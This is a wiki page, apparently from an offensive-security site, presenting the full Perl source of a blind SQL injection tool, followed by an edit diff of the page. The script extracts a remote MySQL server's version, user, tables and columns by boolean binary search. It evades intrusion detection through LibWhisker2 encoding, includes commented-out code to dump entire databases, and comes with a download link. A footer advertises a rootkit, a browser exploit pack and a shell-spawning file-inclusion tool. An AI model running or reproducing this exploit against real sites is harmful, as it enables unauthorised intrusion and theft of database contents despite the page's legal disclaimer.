Latest revision as of 08:32, 21 April 2013

Main article: mysqli-blindutils

This script uses blind SQL injection and boolean enumeration to perform MySQL database mapping.

Special thanks to hatter for his contributions to this article.

Info

Main article: Web exploitation tools

The syntax of this script is:

 perl sqli-p.pl -h [hostname] -u [url] [-q [query]]

Example

Example:

 perl sqli-p.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()"

Description

By default, this script will first determine username, version and database name before enumerating the information_schema information.
When the -q flag is applied, a user can supply any query that returns only a single cell
If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
This script contains error detection : It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
This script uses perl's LibWhisker2 for IDS Evasion (The same as Nikto).
This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.

Disclaimer

The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

#!/usr/bin/perl
use strict;
use Getopt::Std;
use Digest::MD5 qw(md5_hex);
use LW2;
 
my %options = ();
getopts("u:h:q:", \%options);
 
my $url     = $options{u};			# Vuln URL
my $host    = $options{h};			# Needs this for libwhisker
						# Format.
my $count   = 0;
 
if (my $q = $options{q}) {
    $q =~ s/\ /%20/g;
    my ($cxr, $result) = runQuery($url,$host,$q);
    print "Query Result:\n\t$result\nCalculated in $cxr requests.\n";
    exit(1);   
}
 
# Get the Database Version
my $query = "SELECT%20VERSION()";
my ($tmp, $version) = runQuery($url, $host, $query);
$count += $tmp;
$count += 2;
print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n";
 
# Get the Database Name
$query = "SELECT%20DATABASE()";
my ($tmp,$answer) = runQuery($url, $host, $query);
print "Database Name:\t\t$answer\nIn $tmp requests.\n\n";
 
# Get the Database Username
$query = "SELECT%20USER()";
my ($tmp,$answer) = runQuery($url, $host, $query);
print "Database User:\t\t$answer\nIn $tmp requests.\n\n";
 
 
if ($version =~ /5\./g)
{
	print "Enumerating Database Spec:\n";
	getSchema($url,$host);
	exit(1);
} else {
	print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n";
	exit(1);
}
 
sub getSchema
{
	my $url       = shift;
	my $host      = shift;
	my $query     = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())";
	$query        =~ s/ /%20/g;
 
	my ($c, $val) = runQuery($url,$host,$query);
	# $val = number of table names in the current database.
	for (my $i=0; $i < int($val); ++$i)
	{
		$query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1";
		$query =~ s/ /%20/g;
 
		my ($q, $table) = runQuery($url,$host,$query);
		print "$table:\n";
		# $table = table name 
		$query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
		$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
		$query .= "(SELECT DATABASE()) LIMIT $i,1)";
		$query =~ s/ /%20/g;
 
		my ($r, $fcount) = runQuery($url,$host,$query);
		# $fcount - number of columns in the table
		for (my $n = 0; $n < int($fcount); ++$n)
		{
			$query  = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
			$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
			$query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1";
			$query =~ s/ /%20/g;
			my ($o, $field) = runQuery($url,$host,$query);
			print "\t$field\n";
 
# Uncomment the lines below to 
# scrape the entire database.
#			$query = "SELECT COUNT($field) FROM $table";
#			$query =~ s/ /%20/g;
#			my ($r, $total) = runQuery($url,$host,$query);
#			for (my $cn = 0; $cn < $total; $cn++)
#			{
#			    $query = "SELECT $field FROM $table LIMIT $cn,1";
#			    $query =~ s/ /%20/g;
#			    my ($e, $data) = runQuery($url,$host,$query);
#			    print "\t\t$data\n";
#			}
		}
	}
}
 
sub runQuery
{
	my $url   = shift;
	my $host  = shift;
	my $query = shift;
 
	my $qCount;
	my $qCH;
 
	my $pos     = 1;
	my $floor   = 0;				# Bottom of ascii keyrange
	my $ceiling = 255;				# Top of ascii keyrange
 
	my $spacer  = "%20OR%20";
	my $truth   = "62=62/*";
	my $lie     = "88=98/*";
 
	my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host);
	my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query);
	my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host);
	$qCount += $qCH;
	my $results = "";
	while (($pos < $len) || ($pos eq $len))
	{
		my $uri = "$url" . queryConstruct(1, $pos, $spacer, $query);  #construct the actual URI
		my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host);
		$qCount += $qCH;
		my $char = chr("$value");
		$results .= $char;
		++$pos;
	}
	return ($qCount, $results);
}
 
#Logrithm
sub getValue 
{
	my $uri     = shift;
	my $ceiling = shift;
	my $floor   = shift;
	my $true    = shift;
	my $false   = shift;
	my $host    = shift;
 
	my $nextmaybe;
	my $target;
	my $qCount = 0;
 
	my $maybe = int($ceiling/2);    # Get the middle of the total possible range of values
 
	while (not defined $target) {
		if (isGT($uri, $maybe, $host) eq $true)	
		{
			++$qCount;
			$floor = $maybe;
			$nextmaybe = int($maybe + (($ceiling - $floor)/2));
		} elsif (isLT($uri, $maybe, $host) eq $true)
		{
			++$qCount;
			$ceiling = $maybe;
			$nextmaybe = int($maybe - (($ceiling - $floor)/2));
		} elsif (isEQ($uri, $maybe, $host) eq $true)
		{
			++$qCount;
			$target = $maybe;
			return ($qCount, $target);
		}
		$maybe = $nextmaybe;
		if (($maybe eq "") || (!$maybe) || (not defined $maybe))
		{
			print "SQL Error caught!  Aborting!\n";
			print "At least 3 queries in error log!\n";
			exit(1);
		}
	}
}
 
# Is greater than?
sub isGT
{
	my $uri   = shift;
	my $guess = shift;
	my $host  = shift;
	return (md5_hex(download("$uri>$guess)/*", $host)));
}
 
# Is less than?
sub isLT
{
	my $uri   = shift;
	my $guess = shift;
	my $host  = shift;
	return (md5_hex(download("$uri<$guess)/*", $host)));
}
 
# Is equal to?
sub isEQ
{
	my $uri   = shift;
	my $guess = shift;
	my $host  = shift;
	return (md5_hex(download("$uri=$guess)/*", $host)));
}
 
# Ripped off from an older version of the scanner
sub download
{
    my $uri = shift;
    my $try = 5;
    my $host = shift;
    my %request;
    my %response;
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'} = "GET";
    $request{'whisker'}->{'host'} = $host;
    $request{'whisker'}->{'uri'} = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 962;
    $request{'whisker'}->{'user-agent'} = "wget";
    LW2::http_fixup_request(\%request);
    if(LW2::http_do_request(\%request, \%response)) {
        if($try < 5) {
            print "Failed to fetch $uri on try $try. Retrying...\n";
            return undef if(!download($uri, $try++));
        }
        print "Failed to fetch $uri.\n";
        return undef;
    } else {
        return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
    }
}
 
sub queryConstruct
{
	my $type    = shift;
	my $pos     = shift;
	my $spacer  = shift;
	my $query   = shift;
 
	if ($type eq 0)		# Len
	{
		my $newQuery = "LENGTH(($query))";
		my $padding  = "(";
		my $ender    = "";
		return ("$spacer$padding$newQuery$ender");
	} elsif ($type eq 1) 	# String
	{
		my $padding = "((ASCII((LOWER((MID((";          # Begin query construct
		my $ender   = "),$pos,1))))))";                 # End query Construct
		return ("$spacer$padding$query$ender");  	#construct the actual query
	}
}
 
sub makeTrueFalse
{
	my $url    = shift;
	my $spacer = shift;
	my $truth  = shift;
	my $lie    = shift;
	my $host   = shift;
	my $trueMD = md5_hex(download("$url$spacer$truth", $host));
	my $falsMD = md5_hex(download("$url$spacer$lie", $host));
 
	# returns true, false
	return ($trueMD, $falsMD); 
}

Download

Download URL: http://www.blackhatlibrary.net/releases/mysql5enum.tgz

We have more tools coming soon! Look forward to Chimera Live CD.

These are the offensive security tools developed by our wiki staff.

Vanguard - web application vulnerability testing engine written in Perl Jynx2 - A second version of the classic LD_Preload Jynx Rootkit written in C Bleeding Life - PHP and MySQL powered web browser buffer overflow exploit pack GScrape - Perl based google scraper for finding vulnerable websites Kolkata - Configurable web application fingerprinting engine using file checksums written in Perl Lfi_autopwn.pl - automatically spawn a shell using a File inclusion exploit, written in Perl. MySql 5 Enumeration - automatically map the contents of a remote database given a URL vulnerable to SQL injection, written in Perl Social Network Forgery Utility - Rickroll your friends with this PHP content forgery generation utility.

SQL injection/mysqli-blindutils/sqli-p.pl is part of a series on exploitation.
<center>

</center>

@@ Line 1: / Line 1: @@
+{{main|mysqli-blindutils}}
+{{info|<center>This script uses blind [[SQL injection]] and [[boolean enumeration]] to perform [[SQL_injection#MySQL_Database_Mapping|MySQL database mapping]].</center>}}
+<font size="-2">Special thanks to [[User:hatter|hatter]] for his contributions to this article.</font>
 =Info=
-{{info|<center>This script uses blind [[SQL injection]] and [[boolean enumeration]] to perform [[SQL_injection#MySQL_Database_Mapping|MySQL database mapping]].</center>}}
+{{Main|Web exploitation tools}}
 The syntax of this script is:
-   perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]
+   perl sqli-p.pl -h [hostname] -u [url] [-q [query]]
 ==Example==
 Example:
-   perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()"
+   perl sqli-p.pl -h www.target.tld -u <nowiki>http://www.target.tld/vuln.ext?input=24</nowiki> -q "select system_user()"
 ==Description==
@@ Line 12: / Line 14: @@
 * When the -q flag is applied, a user can supply any query that returns only a single cell
 * If the exploit or vulnerability requires a single quote, simply tack '''%27''' to the end of the URI.
-* This script contains '''error detection : It will only work on a mysql 5.x database, and knows when its queries have syntax errors.'''
+* This script contains '''error detection : It will only work on a [[MySQL|mysql]] 5.x [[database]], and knows when its queries have syntax errors.'''
-* This script uses perl's LibWhisker2 for IDS Evasion (The same as Nikto).
+* This script uses perl's LibWhisker2 for [[IDS Evasion]] (The same as Nikto).
-* This script uses the MD5 algorithm for optimization.  There are other optimization methods, and this may not work on all sites.
+* This script uses the [[cryptography#hashes|MD5 algorithm]] for optimization.  There are other optimization methods, and this may not work on all sites.
 ==Disclaimer==
 {{warning|The end-user is liable for his-or her own actions with the use of this software.  Running this against a system you do not own without written authorization is a criminal act.}}
@@ Line 283: / Line 285: @@
 }
 </source>}}
+= Download =
+* '''Download URL''': http://www.blackhatlibrary.net/releases/mysql5enum.tgz
 {{InHouse}}

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-p.pl"

Latest revision as of 08:32, 21 April 2013

Contents

Info

Example

Description

Disclaimer

Source

Download

Navigation menu

Views

Personal tools

Wiki

Community

Search

Tools